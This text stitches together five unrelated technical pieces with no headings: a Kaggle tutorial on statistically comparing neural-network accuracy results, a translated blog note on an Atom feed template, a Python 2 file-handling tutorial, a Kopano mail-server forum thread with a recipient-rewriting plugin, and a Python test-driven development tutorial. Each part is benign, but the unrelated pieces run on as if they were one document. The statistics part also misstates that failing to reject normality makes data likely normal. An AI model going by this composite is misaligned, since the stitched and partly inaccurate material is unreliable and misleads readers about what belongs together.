Experimental design - Before we conduct our experiment, we need to have a clear idea of what we're doing. It's important to know what we're looking for, how we're going to use our dataset, what algorithms we will be employing, and how we will determine whether the performance of our approach is successful.
Implementation - We will use the Keras API on top of TensorFlow to implement our experiment. All code will be in Python, and at the time of publishing everything is guaranteed to work within a Kaggle Notebook.
Results - Supported by figures and statistics, we will have a look at how our solution performed and discuss anything interesting about the results.
Results
In the last article we prepared our dataset such that it was ready to be fed into our neural network training and testing process. We then built and trained our neural network models using Python and Keras, followed by some simple automation to generate thirty samples per arm of our experiment. Now, we'll have a look at how our solutions performed and discuss anything interesting about the results. This will include some visualisation, and we may even return to our experiment code to produce some new results.
Let's remind ourselves of our testable hypothesis:
Hypothesis: A neural network classifier's performance on the Iris Flower dataset is affected by the number of hidden layer neurons.
When we test our hypothesis, there are two possible outcomes:
$H_0$ the null hypothesis: insufficient evidence to support hypothesis.
$H_1$ the alternate hypothesis: evidence suggests the hypothesis is likely true.
Strictly speaking, our experiments will not allow us to decide on an outcome. Our experimental arm uses the same structure as the control arm except for one variable: the number of neurons in the hidden layer changes from four to five. Therefore, we are only testing whether this change affects the performance of the neural network classifier.
Loading the results
Similar to the last three parts of this series, we will be using a Kaggle Kernel notebook as our coding environment. If you saved your results to files using a Kaggle Notebook, you will need to load those files into your draft environment as a data source. It's not immediately obvious where the files have been stored, but you can locate them by repeating the following steps:
Once you have the data in your environment, use the following code to load the data into variables. You will need to adjust the parameters for read_csv() to match your filenames.
Note
Below you will see iris-flower-dataset-classifier-comparison used in the pathnames, be sure to use the correct pathnames for your own experiment.
results_control_accuracy = pd.read_csv("/kaggle/input/iris-flower-dataset-classifier-comparison/results_control_accuracy.csv")
results_experimental_accuracy = pd.read_csv("/kaggle/input/iris-flower-dataset-classifier-comparison/results_experimental_accuracy.csv")
If you don't have access to the results generated from the previous article, then you are welcome to use my results with the following code:
results_control_accuracy = pd.DataFrame([0.9333333359824286, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9555555568801032, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.6000000052981906, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9111111124356588, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9555555568801032, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9111111124356588])
results_experimental_accuracy = pd.DataFrame([0.9111111124356588, 0.9555555568801032, 0.9555555568801032, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9555555568801032, 0.933333334657881, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9555555568801032, 0.9777777791023254, 0.933333334657881, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9333333359824286, 0.9777777791023254, 0.9777777791023254, 0.9333333359824286, 0.9777777791023254, 0.9555555568801032, 0.9777777791023254, 0.9777777791023254])
Basic stats
With our results loaded, we can get some quick stats to start comparing the performance differences between the two arms of our experiment.
We can start by comparing the mean performance of the control arm against the experimental arm. Using pandas and numpy, we can write the following code:
mean_control_accuracy = results_control_accuracy.mean()
print("Mean Control Accuracy: {}".format(mean_control_accuracy))
mean_experimental_accuracy = results_experimental_accuracy.mean()
print("Mean Experimental Accuracy: {}".format(mean_experimental_accuracy))
The output of which will be the following if you've used the data provided above:
At this point, it may be tempting to claim that the results generated by the experimental arm of our experiment have outperformed those of the control arm. Whilst it's true that the mean accuracy of the 30 samples from the experimental arm is higher than that of the control arm, we are not yet certain of the significance of these results. The difference in performance could have occurred simply by chance, and if we generated another set of 30 samples the results could be the other way around.
Before moving on, it may also be useful to report the standard deviation of the results in each arm of the experiment:
std_control_accuracy = results_control_accuracy.std()
print("Standard Deviation of Control Accuracy Results: {}".format(std_control_accuracy))
std_experimental_accuracy = results_experimental_accuracy.std()
print("Standard Deviation of Experimental Accuracy Results: {}".format(std_experimental_accuracy))
The output of which will be the following if you've used the data provided above:
Visualising the results
Moving on to visualisations, one common plot used to compare this type of data is the box plot, which we can produce using pandas.DataFrame.boxplot(). Before we do this, we need to move the results from both arms of our experiment into a single DataFrame and name the columns.
results_accuracy= pd.concat([results_control_accuracy, results_experimental_accuracy], axis=1)
results_accuracy.columns = ['Control', 'Experimental']
If we print out this new variable, we can see all our results are now in a single DataFrame with appropriate column headings:
We can produce a box plot using a single line of code:
results_accuracy.boxplot()
The output of which will be the following if you've used the data provided above:
However, the scale of the plot has made it difficult to compare the two sets of data. We can see the problem with our own eyes: it's down to one of the samples from the control arm of the experiment, which sits at around $0.60$ and is a clear outlier.
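If we want to confirm exactly which run is responsible, a quick boolean filter over the combined DataFrame built above will show it (a minimal sketch; the 0.9 threshold is arbitrary and only meant to isolate the obvious outlier):

print(results_accuracy[results_accuracy['Control'] < 0.9])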
With pandas we can try two approaches to remove this outlier from view and get a better look. One is not to plot the outliers, using the showfliers parameter of the box plot method:
results_accuracy.boxplot(showfliers=False)
Which will output:
Or to instead specify the y-axis limits for the box plot:
ax = results_accuracy.boxplot()
ax.set_ylim([0.9,1])
Which will output:
Distribution of the data
It may also be useful to find out if our results are normally distributed, as this will help us decide which parametric or non-parametric tests to use. You may be able to make this decision using a histogram:
results_accuracy.hist(density=True)
Which will output the following:
But normally you will want to use a function that will test the data for you. One approach is to use scipy.stats.normaltest():
This function tests the null hypothesis that a sample comes from a normal distribution.
This function will return two values: one called the statistic and, most importantly for us, the p-value, which is the probability produced by the hypothesis test. A p-value, always between 0 and 1, indicates the strength of evidence against the null hypothesis. A smaller p-value indicates greater evidence against the null hypothesis, whilst a larger p-value indicates weaker evidence against it.
For this test, the null hypothesis is that the samples come from a normal distribution. Before using the test, we need to decide on a value for alpha, our significance level. This is essentially the "risk" of concluding a difference exists when it doesn't; e.g., an alpha of $0.05$ indicates a 5% risk. We can consider alpha to be a kind of threshold. This will be covered in more detail in another article, but for now we will set $0.05$ as our alpha. This means that if our p-value is less than $0.05$, the null hypothesis is rejected and the samples are likely not from a normal distribution. Otherwise, the null hypothesis cannot be rejected, and the samples are likely from a normal distribution.
Let's write some code to determine this for us:
from scipy import stats
alpha = 0.05
s, p = stats.normaltest(results_control_accuracy)
if p < alpha:
print('Control data is not normal')
else:
print('Control data is normal')
s, p = stats.normaltest(results_experimental_accuracy)
if p < alpha:
print('Experimental data is not normal')
else:
print('Experimental data is normal')
The output of which will be the following if you've used the data provided above:
Significance testing
Finally, let's test the significance of our pairwise comparison. The significance test you select depends on the nature of your data-set and other criteria; e.g. some select non-parametric tests if their data-sets are not normally distributed. We will use the Wilcoxon signed-rank test through the following function: scipy.stats.wilcoxon():
The Wilcoxon signed-rank test tests the null hypothesis that two related paired samples come from the same distribution. In particular, it tests whether the distribution of the differences x - y is symmetric about zero. It is a non-parametric version of the paired T-test.
https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.wilcoxon.html
This will give us some idea as to whether the results from the control arm are significantly different from those of the experimental arm. This will again return a p-value, and we will compare it with an alpha of $0.05$.
s, p = stats.wilcoxon(results_control_accuracy[0], results_experimental_accuracy[0])
if p < 0.05:
print('null hypothesis rejected, significant difference between the data-sets')
else:
print('failed to reject the null hypothesis, no significant difference between the data-sets')
The output of which will be the following if you've used the data provided above:
This means that although the mean accuracy of our experimental arm samples is higher than the mean performance of our control arm, the difference could easily have arisen purely by chance. We cannot say that one is better than the other.
Conclusion
In this article we had a look at how our solutions performed, using some simple statistics and visualisations. We also tested whether our results came from a normal distribution, and whether the results from both arms of our experiment were significantly different from each other. Through significance testing we determined that we could not claim that one arm of the experiment outperformed the other, despite the difference in mean performance. Regardless, a result is a result, and we can extend our experiment to cover a range of hidden layer sizes instead of only comparing four neurons with five (see the sketch below).
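As a rough sketch of what that extension could look like (assuming the train/test splits and model-building style from the earlier implementation article; the layer range, epoch count and variable names here are illustrative only, not results we measured):

import pandas as pd
from tensorflow import keras

def build_model(hidden_neurons):
    # Illustrative only: a small dense network for the 4-feature, 3-class Iris data
    model = keras.Sequential([
        keras.layers.Dense(hidden_neurons, activation='relu', input_shape=(4,)),
        keras.layers.Dense(3, activation='softmax'),
    ])
    model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
    return model

results = {}
for hidden_neurons in range(3, 9):      # the range of hidden layer sizes under test
    accuracies = []
    for _ in range(30):                 # thirty samples per arm, as before
        model = build_model(hidden_neurons)
        model.fit(train_x, train_y, epochs=100, verbose=0)   # train_x/train_y assumed from the earlier article
        _, accuracy = model.evaluate(test_x, test_y, verbose=0)
        accuracies.append(accuracy)
    results[hidden_neurons] = accuracies

results_range = pd.DataFrame(results)
results_range.boxplot()

The same normality and significance tests could then be applied pairwise across the columns of results_range.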
Thank you for following this four-part series on Machine Learning with Kaggle Notebooks. If you notice any mistakes or wish to make any contributions, please let me know either using the comments or by e-mail.
|
It ignores the document's status: false and still pushes the post into the feed. A big BUG!
The official feed.jade fetches the 10 most recent posts:
feed_posts = posts.recent_10
To exclude a certain category, which is really just a certain folder, you only need to change this line. After more testing than expected, I've changed it for now to:
d.get_data(type='post+folder',status='public',excludes=['chat','photos','images','pages','_','template','configs'],limit=10,sort='desc')
The docs actually mention a path parameter for get_data:
path defaults to
/ (equivalent to the site root) and restricts the path of the queried data; for example, path='docs/' means only data under the docs/ directory is queried.
But my category folders sit directly in the root directory, and this path parameter can only restrict a single path. Writing several like path=['coding','reading'] is invalid, and running it just throws a pile of errors...
The full code is below; save it as feed.jade and drop it into the theme's template folder:
doctype xml
+set_content_type('application/xml')
feed(xmlns="http://www.w3.org/2005/Atom")
title= site.title
link(href="https://{{ request.host }}/")
link(ref="self", href="https://{{ request.host }}/feed")
id= site._id
feed_posts = d.get_data(type='post+folder', excludes=['chat','photos','images','pages','_','template','configs'],limit=10,sort='desc')
if feed_posts
updated= feed_posts[0]['date'].strftime('%Y-%m-%dT%H:%M:%SZ')
for post in feed_posts
entry
post_url = 'https://' + request.host + post.url.escaped
title= post.title.escaped
link(href=post_url, rel="alternate")
updated= post.date.strftime('%Y-%m-%dT%H:%M:%SZ')
id= post.url_path.escaped
author
name= site.configs.admin_name
summary(type="html")= post.content.escaped
|
0x00 File operations
Reading and writing files
r reads; rb reads binary files (such as images and videos); w overwrites; a+ appends.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
f = open("test.txt","r")
data = f.read()
print "File name: ",f.name
print "File open moudle: ",f.mode
print "File is close ?",f.closed
print "File content: ",data
finally:
f.close()
with open("test.txt","a+") as f: #自动调用close()
data = "\nYes,I know."
f.write(data)
print u"写入内容:%s" % data
with open("test.txt","r") as f:
#readlines()一次读取一行,返回一个列表,也可以用read(size)读取指定大小
line = f.readlines()
print line
Moving the file pointer
#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
f = open("test.txt","r")
data = f.read(6) # read 6 bytes, so the pointer position is 6
print u"Current pointer position:",f.tell()
f.seek(4,0) # 0 means from the beginning of the file; move to offset 4
print u"Current pointer position:",f.tell()
f.seek(-3,1) # 1 means relative to the current position; move back 3
print u"Current pointer position:",f.tell()
f.seek(-10,2) # 2 means relative to the end of the file; move back 10
print u"Current pointer position:",f.tell()
finally:
f.close()
Managing files
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import time
if not os.path.exists("test.txt"):
f = open("test.txt","w") #新建文件
f.close()
print u"新建文件test.txt"
else:
os.rename("test.txt","temp.txt") #重命名
print u"文件test.txt重命名为temp.txt"
if os.path.exists("temp.txt"):
time.sleep(2)
os.remove("temp.txt") #删除文件
print u"删除文件temp.txt"
0x01 Directory operations
Basic directory operations
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import time
if not os.path.exists("test"):
os.mkdir("test") #创建目录
print u"创建目录test"
if not os.path.exists("aa/bb/cc"):
os.makedirs("aa/bb/cc") #创建多级目录
print u"创建多级目录aa/bb/cc"
else:
print u"多级目录已经存在"
if os.path.exists("test"):
time.sleep(2)
os.rmdir("test") #删除空的目录,目录内不能有东西
print u"删除空目录test"
print u"当前工作路径:",os.getcwd() #得到当前工作路径
os.chdir("d:\Clone") #切换工作路径
print u"切换工作路径到d:\Clone"
print u"当前工作路径:",os.getcwd()
Deleting a non-empty directory
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
def deldir(dirname):
if os.path.exists(dirname):
dlist = os.listdir(dirname)
if dlist:
# print dlist
for x in dlist:
subFile = os.path.join(dirname,x)
# print subFile
if os.path.isfile(subFile):
print "remove file %s" % subFile
os.remove(subFile)
if os.path.isdir(subFile):
deldir(subFile)
print "remove dir %s" % dirname
os.rmdir(dirname)
else:
print "the dir is not exists"
dirname = raw_input("Please enter the name of the folder you want to delete: ")
deldir(dirname)
Common os methods
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
print os.name # prints a string indicating the platform in use
print os.linesep # the line terminator used on the current platform; "\r\n" on Windows
os.system("whoami") # run a system command
print os.getcwd() # get the current working directory
print os.path.abspath('D:\Clone') # get an absolute path
print os.listdir('C:\\Users\\WYB_9\\Desktop\\a') # return all file and directory names in a directory
print "#########################"
print os.path.isfile('python.py')
print os.path.isdir('D:\Clone') # check whether the given path is a file or a directory
print os.path.exists('D:\Clone') # check whether the given path (file or folder) actually exists
print os.path.normpath('c:/windows\\system32\\') # normalize the path string format
print "#########################"
print os.path.getsize('python.py') # get the file size; returns 0L if name is a directory
print os.path.join('C:\windows', '1.txt') # join a directory with a file name or another directory
print os.path.split('C:\windows\c.txt') # return a path's directory name and file name
print os.path.dirname('C:\windows\c.txt') # return the directory name
print os.path.basename('C:\windows\c.txt') # return the file name
print os.path.splitext('1.txt') # split the file name and the extension
|
Wrong receiver address displayed
Hi,
Any suggestions?
Hi @h44z ,
Yes, it shows the original To in the header, since this is stored as received from the MTA.
But the fact that you don't see the alias in the WebApp has a reason as well. When a message is delivered by the dagent it will try to resolve all participants against the GAB (and replace the individual recipient with a reference against the GAB). This is done so that our clients can more easily look up free/busy and presence data.
The simple workaround, if you don't want to have the user resolved against the GAB, is to remove the aliases from the GAB.
Hi,
Thanks for the reply. But I can't remove the kopanoAlias from the user, because the user also sends mails using the alias address. If I remove the alias, the user gets an error message that he is not allowed to send from the alias address.
It would be nice to have a setting to either display the user from the gab or the original To header field.
A short update:
I have written a simple plugin for Kopano WebApp that allows the user to see the "original" receiver address.
If the To: header differs from the displayed receiver, the plugin will add an extra line to the email information.
For example: Gesendet: Montag 3 April 2017 00:20 An: Max Muster <max.m@test.de> Original To: maxi.muster@gmail.com
The plugin can be found here: https://git.sprinternet.at/zarafa_webapp/origrcv
Even though I found a workaround using this plugin, a configurable option for Kopano WebApp would be nice to have. @fbartels Where can I create a feature/bug request?
This is a problem for me too. For the moment I've included @h44z 's plugin in my installation as well, but an option in dagent or webapp to disable this behaviour would be very much appreciated by me.
Pozzo-Balbi last edited by
Hi,
a WebApp plugin does not solve the problem. Emails synced via z-push still show the wrong address, and the same goes for IMAP sync. Furthermore, the "sed -i" of kopano-dagent also works on attached emails (sic!). See picture
See post https://forums.zarafa.com/showthread.php?13528-Zarafa-Kopano-replace-alias-emails-with-email-of-user&p=58359&viewfull=1#post58359 for full problem explanation.
Last but not least, to prove that it is a bug and not a feature, I have use of GAB disabled where possible (e.g. server.cfg: enable_gab = no). I use ldap plugin.
A kopano-dagent setting to disable this behaviour would be greatly appreciated.
Thanks
Yeah, I just noticed that the problem still appears on mobile/z-push. I'm probably just going to patch this out of dagent myself and put it behind a config option. I can submit a patch/pull request to the kopano source tree if you guys take code?
I can submit a patch/pull request to the kopano source tree if you guys take code?
Sure, patches are welcome! You can find the contributing information at https://stash.kopano.io/projects/KC/repos/kopanocore/browse/CONTRIBUTING.md and as long as you make this behavior optional and non-default I don't see a problem with it.
OK, I'm working on a patch but it's a little harder than I thought. It seems there's no explicit point in the code where this happens. I was looking in ResolveUsers() but I don't think that's it.
hpvb last edited by hpvb
I actually ended up writing a DAgent plugin for this. This was way easier and a little easier for me to manage with regards to upgrades. It'd be nice if there were SRPMs for the open source packages :)
This only partially fixes the problem though: From headers are still rewritten, which is very confusing too :)
Maybe this shows what my/our problem is though. I don't know how much work it'd be to do this in DAgent directly.
import MAPI
import email
from email.utils import getaddresses
from MAPI.Util import *
from plugintemplates import *
class RewriteUsers(IMapiDAgentPlugin):
def __init__(self, logger):
IMapiDAgentPlugin.__init__(self, logger)
def PreDelivery(self, session, addrbook, store, folder, message):
headers = message.GetProps([PR_TRANSPORT_MESSAGE_HEADERS], 0)[0].Value
msg = email.message_from_string(headers)
to_addrs = getaddresses(msg.get_all('to', []))
cc_addrs = getaddresses(msg.get_all('cc', []))
names = []
for addr in to_addrs:
names.append([
SPropValue(PR_RECIPIENT_TYPE, MAPI_TO),
SPropValue(PR_DISPLAY_NAME_W, unicode(addr[0])),
SPropValue(PR_ADDRTYPE, 'SMTP'),
SPropValue(PR_EMAIL_ADDRESS, unicode(addr[1])),
])
for addr in cc_addrs:
names.append([
SPropValue(PR_RECIPIENT_TYPE, MAPI_CC),
SPropValue(PR_DISPLAY_NAME_W, unicode(addr[0])),
SPropValue(PR_ADDRTYPE, 'SMTP'),
SPropValue(PR_EMAIL_ADDRESS, unicode(addr[1])),
])
message.ModifyRecipients(0, names)
return MP_CONTINUE,
@hpvb thanks for posting the plugin. If you add some documentation and upload it somewhere (for example in a gist on GitHub), then you could also add it to https://stash.z-hub.io/projects/COM/repos/projects-and-resources/browse#Kopano-dAgent-Spooler-Plugins
@fbartels sure, I'll set up a repository for it and add some documentation. This may be useful for others besides just me and the other two people in this thread.
hpvb last edited by hpvb
@fbartels Does this look OK to you?
https://notabug.org/hp/kopano-dagent-rewritegaladdresses
If so I'll add it to that wiki page.
@hpvb did not test your script, but the description reads fine for me. Thanks for making a repository for it.
I've sent a PR for that repository. Thanks for your feedback.
Pozzo-Balbi last edited by
@hpvb thanks a lot. Can't wait for your patch to reach the nightly builds.
@Pozzo-Balbi I didn't end up writing a patch for dagent, but a plugin for dagent. You can get it here: https://notabug.org/hp/kopano-dagent-rewritegaladdresses. Once that is installed everything should start working. I've had it running for 5 days now without issue.
mnewman last edited by
Can someone please fix the plugin? It's not working with Python 3 in Kopano 8.7.
Thanks
Markus
|
Overview
Test Driven Development (TDD) is a great approach for software development. TDD is nothing but writing tests before adding a feature to the code.
This approach is based on the principle that we should write small pieces of code rather than long ones. In TDD, whenever we want to add more functionality to our code, we first have to write a test for it. After that, we add the new functionality in small increments and check it against our test. This approach helps us reduce the risk of encountering significant problems at the production level. You may also love to read more about TDD and Unit Testing in this blog.
Test Driven Development (TDD)
Test Driven Development is an approach in which we write a test first, watch it fail, and then refactor our code to make it pass.
Test Driven Development (TDD) Approach
As the name suggests, we should add the test before adding the functionality to our code. Our target is then to make the test pass by adding new code to our program, so we refactor our code until the written test passes. This uses the following process –
Write a failing unit test
Make the unit test pass
Repeat
Test Driven Development (TDD) Process Cycle
As shown in the flow
First, add tests for the functionality.
Next, we run our test to fail.
Next, we write code according to the error we received.
Then we run the tests again to see if the test fails or passes.
Then refactor the code and follow the process again.
Benefits of Test Driven Development (TDD)
Now the question arises: why should one opt for the TDD approach? Practicing TDD brings lots of benefits, some of which are listed below –
In TDD we build the test before adding any new feature, which means that with the TDD approach our entire code base is covered by tests. That's a great benefit compared to code which has no test coverage.
In TDD one should have a specific target before adding new functionality; that is, before adding any new functionality one should be clear about its expected outcome.
In an application, one method depends on another. When we write tests before the methods, we are forced to think clearly about the interfaces between them. That allows us to integrate each method with the entire application efficiently and helps make our application modular too.
As the entire code base is covered by tests, our final application will be less buggy. This is a big advantage of the TDD approach.
Acceptance Test Driven Development (ATDD)
ATDD is short for Acceptance Test Driven Development. In this process, the user, the business manager and the developer are all involved.
First, they discuss what the user wants in the product; then the business manager creates sprint stories for the developer. After that, the developer writes tests before starting the project and then starts coding the product.
Every product or piece of software is divided into small modules, so the developer codes the very first module, tests it, and watches the test fail. If the test passes and the code works as per the user requirements, they move on to the next user story; otherwise, changes are made to the code to make the test pass.
This process is called Acceptance Test Driven Development.
Behavior Driven Development (BDD)
Behavior Driven Development is similar to Test Driven Development in that tests are written first, run, and then more code is added to make them pass.
The major difference between the two is that tests in BDD are written in plain, descriptive, English-like grammar.
Tests in BDD aim at describing the behaviour of the application and are more user-focused. These tests use examples to clarify the user requirements in a better way.
Features of Behavior Driven Development (BDD)
The major change is in the thought process, which has to shift from thinking in tests to thinking in behaviour.
A ubiquitous language is used; hence it is easy to explain.
BDD approach is driven by business value.
It can be seen as an extension to TDD; it uses natural language which is easy to understand by non-technical stakeholders as well.
You May also Love to Read
Test Driven Development in Scala
Behavior Driven Development (BDD) Approach
We believe that the role of testing and test automation (as in TDD) is essential to the success of any BDD initiative. Testers have to write tests that validate the behaviour of the product or system being built.
The test results produced are readable by non-technical users as well. For Behavior Driven Development to be successful, it becomes crucial to identify and verify only those behaviours that contribute directly to business outcomes.
A developer in a BDD environment has to identify what to test and what not to test, and to understand why a test failed. Much like Test Driven Development, BDD also recommends that tests should be written first and should describe the functionality of the product against the requirements.
Behavior Driven Development helps greatly when building detailed automated unit tests because it focuses on testing behaviour instead of testing implementation. The developer thus has to focus on writing test cases keeping the scenario rather than the code implementation in mind.
By doing this, even when the requirements change, the developer does not have to change the test, input and output to support them. That makes unit-testing automation much faster and more reliable.
Though BDD has its own set of advantages, it also has limitations. Development teams and testers therefore need to accept that while a failing test is a guarantee that the product is not ready to be delivered to the client, a passing test does not mean that the product is ready for launch.
The loop is closed when the development, testing and business teams give updates and progress reports on time. Since the testing effort is moved more towards automation and covers all business features and use cases, this framework ensures a high defect-detection rate due to higher test coverage, faster changes, and timely releases.
Benefits of Behavior Driven Development (BDD)
It is highly suggested for teams and developers to adopt BDD because of several reasons, some of them are listed below –
BDD provides a very accurate guidance on how to be organizing communication between all the stakeholders of a project, may it be technical or non-technical.
BDD enables early testing in the development process, early testing means lesser bugs later.
By using a language that is understood by all, rather than a programming language, a better visibility of the project is achieved.
The developers feel more confident about their code and that it won’t break which ensures better predictability.
Test Driven Development (TDD) with Python
Here we explore the test-driven development approach with Python. Python's official interpreter comes with the unittest module.
Python Unit Testing
These are the main checks we use with Python unit testing; each corresponds to an assert method on unittest.TestCase, as shown in the sketch after this list:
a == b
a != b
bool(x) is True
bool(x) is False
a is b
a is not b
x is None
x is not None
a in b
a not in b
isinstance(a, b)
not isinstance(a, b)
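A minimal sketch for illustration (the values are made up; the method names are the standard unittest ones that correspond to the checks above):

import unittest

class AssertionExamples(unittest.TestCase):
    def test_checks(self):
        self.assertEqual(2 + 2, 4)          # a == b
        self.assertNotEqual(2 + 2, 5)       # a != b
        self.assertTrue([1])                # bool(x) is True
        self.assertFalse([])                # bool(x) is False
        self.assertIsNone(None)             # x is None
        self.assertIn(3, [1, 2, 3])         # a in b
        self.assertIsInstance("abc", str)   # isinstance(a, b)

if __name__ == '__main__':
    unittest.main()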
You May also Love to Read
Test Driven & Behavior Driven Development in Java
Test Driven Development (TDD) in Python with Examples
We are going to work on an example banking problem. Let's say that our banking system introduced a new facility to credit money, so we have to add this to our program.
Following the TDD approach, before adding this credit feature we first write a test for the functionality.
Setting Up Environment For Test Driven Development (TDD)
This is our directory structure
Writing Test For Test Driven Development (TDD)
So we write the following code for the unittest in the test/tdd_example.py
import unittest
class Tdd_Python(unittest.TestCase):
    def test_banking_credit_method_returns_correct_result(self):
        bank = Banking()
        final_bal = bank.credit(1000)
        self.assertEqual(1000, final_bal)
Here we first import the unittest module and then write our test method. One thing to note is that every test method's name must start with the word test.
Now we run this program
File "/PycharmProjects/TDD_Python/test/tdd_example.py", line 6, in test_banking_credit_method_returns_correct_result
bank = Banking()
NameError: name 'Banking' is not defined
We get an error here, Banking is not defined, because we have not created it yet.
Implementing Test Driven Development (TDD) in Python
So first we have to create our Banking class in the app/banking_app.py file
class Banking():
    def __init__(self):
        self.balance = 0
    def credit(self, amount):
        pass
And now our test/tdd_example.py looks like this
import unittest
from app.banking_app import Banking
class Tdd_Python(unittest.TestCase):
    def test_banking_credit_method_returns_correct_result(self):
        bank = Banking()
        final_bal = bank.credit(1000)
        self.assertEqual(1000, final_bal)
if __name__ == '__main__':
    unittest.main()
Now let’s run the test again
AssertionError: 1000 != None
Ran 1 test in 0.002 s
FAILED(failures = 1)
The test fails because we don't get any return value from the credit method of the Banking class, so we have to fix it
class Banking():
    def __init__(self):
        self.balance = 0
    def credit(self, amount):
        self.balance += amount
        return self.balance
Now run the test again
Testing started at 5:10 PM...
Ran 1 test in 0.001s
OK
That is a success: we added credit functionality to our banking class and it works as expected.
But our program is not yet able to handle some situations; for example, if a user enters a string instead of a number, our program might crash. So we have to deal with this situation.
First, we have to write our test for this
import unittest
from app.banking_app import Banking
class Tdd_Python(unittest.TestCase):
    def setUp(self):
        self.bank = Banking()
    def test_banking_credit_method_returns_correct_result(self):
        final_bal = self.bank.credit(1000)
        self.assertEqual(1000, final_bal)
    def test_banking_credit_method_returns_error_if_args_not_numbers(self):
        self.assertRaises(ValueError, self.bank.credit, 'two')
if __name__ == '__main__':
    unittest.main()
The output is this
Ran 2 tests in 0.002 s
FAILED(errors = 1)
The code is failing because we have not added that functionality in our app
After adding in our code the code will look like this
class Banking():
    def __init__(self):
        self.balance = 0
    def credit(self, amount):
        amount_type = (int, float, complex)
        if isinstance(amount, amount_type):
            self.balance += amount
            return self.balance
        else:
            raise ValueError
After running the test we get
Testing started at 5:33 PM...
Launching unittests with arguments python -m unittest tdd_example.py in /PycharmProjects/TDD_Python/test
Ran 2 tests in 0.002s
OK
Similarly, we can add more functionality to our app by following the same process.
In a bank there are more operations, such as debiting money, which means we have to add debit functionality as well.
So we start with the same approach, first building a test for the debit operation
import unittest
from app.banking_app import Banking
class Tdd_Python(unittest.TestCase):
    def setUp(self):
        self.bank = Banking()
    def test_banking_credit_method_returns_correct_result(self):
        final_bal = self.bank.credit(1000)
        self.assertEqual(1000, final_bal)
    def test_banking_credit_method_returns_error_if_args_not_numbers(self):
        self.assertRaises(ValueError, self.bank.credit, 'two')
    def test_banking_debit_method_returns_correct_result(self):
        self.bank.credit(1000)  # credit first so there is a balance to debit from
        final_bal = self.bank.debit(700)
        self.assertEqual(300, final_bal)
    def test_banking_debit_method_returns_error_if_args_not_numbers(self):
        self.assertRaises(ValueError, self.bank.debit, 'two')
if __name__ == '__main__':
    unittest.main()
As expected we get the error
AttributeError: 'Banking' object has no attribute 'debit'
Ran 4 tests in 0.003 s
FAILED(errors = 2)
So we refactor our code again by adding debit money method
class Banking():
    def __init__(self):
        self.balance = 0
    def credit(self, amount):
        amount_type = (int, float, complex)
        if isinstance(amount, amount_type):
            self.balance += amount
            return self.balance
        else:
            raise ValueError
    def debit(self, amount):
        amount_type = (int, float, complex)
        if isinstance(amount, amount_type):
            self.balance -= amount
            return self.balance
        else:
            raise ValueError
And now running the test again
Testing started at 5:44 PM...
Launching unittests with arguments python -m unittest /PycharmProjects/TDD_Python/test/tdd_example.py in /PycharmProjects/TDD_Python/test
Ran 4 tests in 0.002s
OK
Test Driven Development (TDD) Tools For Python
nosetest
nosetests is a test runner that comes with the nose package. We can easily install it with pip:
$ pip install nose
Once it is installed successfully we can run test file simply by just
$ nosetests example_unit_test.py
And the result is as follow
(venv) xenon@dm08:~/PycharmProjects/TDD_Python$ nosetests test/tdd_example.py
----------------------------------------------------------------------
Ran 4 tests in 0.001s
OK
Or execute tests of folder
$ nosetests /path/to/tests
py.test
py.test is similar to nosetests; one thing that makes it nice is that it shows the output of each test in a separate bottom area.
We can install this by the following command
$ pip install pytest
Once it is installed successfully we can run test file simply by just
$ py.test test/example_unit_test.py
(venv) xenon@dm08:~/PycharmProjects/TDD_Python$ py.test test/tdd_example.py
===================== test session starts =====================
platform linux -- Python 3.4.3, pytest-3.2.5, py-1.5.2, pluggy-0.4.0
rootdir: /home/xenon/PycharmProjects/TDD_Python, inifile:
collected 4 items
test/tdd_example.py ....
===================== 4 passed in 0.09 seconds =====================
unittest
unittest is the default test package of Python. It is useful when we don't want to install external packages. To use it, just add the following lines to the code
if __name__ == '__main__':
unittest.main()
unittest.mock
In Python, there is a library unittest.mock for testing. It is useful when we want to test code that depends on a function which takes a long time to complete: we use the unittest.mock library to mock that function. The library lets us replace objects with mock objects and make assertions about how they are used. unittest.mock provides a Mock class, MagicMock and patch(). Here is a quick example of using them.
Suppose our credit function takes too long to complete. Instead of calling the real credit function in the test, we mock it to speed up the testing
import unittest
from unittest.mock import patch
from app.banking_app import Banking
class TestBanking(unittest.TestCase):
    @patch('app.banking_app.Banking.credit', return_value=1700)
    def test_credit(self, credit):
        self.assertEqual(credit(700), 1700)
After running this test we get the following output
(venv) xenon@dm08:~/PycharmProjects/TDD_Python$ py.test test/mock.py
===================== test session starts =====================
platform linux -- Python 3.4.3, pytest-3.2.5, py-1.5.2, pluggy-0.4.0
rootdir: /home/xenon/PycharmProjects/TDD_Python, inifile:
collected 1 item
test/mock.py .
===================== 1 passed in 0.14 seconds =====================
You May also Love to Read
Test Driven & Behavior Driven Development in JavaScript and React.JS
Summary
In the TDD approach the main objective is to fail first and then rectify your code. We first build a test, fail the test, and then refactor our code to pass the test. This approach uses the idea that we should first finalize what we require, then build the target test for it, and then start to achieve that target.
How Can XenonStack Help You?
XenonStack follows the Test Driven Development Approach in the development of Enterprise level Applications following Agile Scrum Methodology.
Data Analysis Services
XenonStack Data Analysis services offer data preparation, statistical analysis, creating meaningful data visualizations, predicting future trends, and more. Python offers a rich set of utilities and libraries for data processing and data analytics tasks. Data analysis libraries include Pandas, NumPy, SciPy, IPython and more.
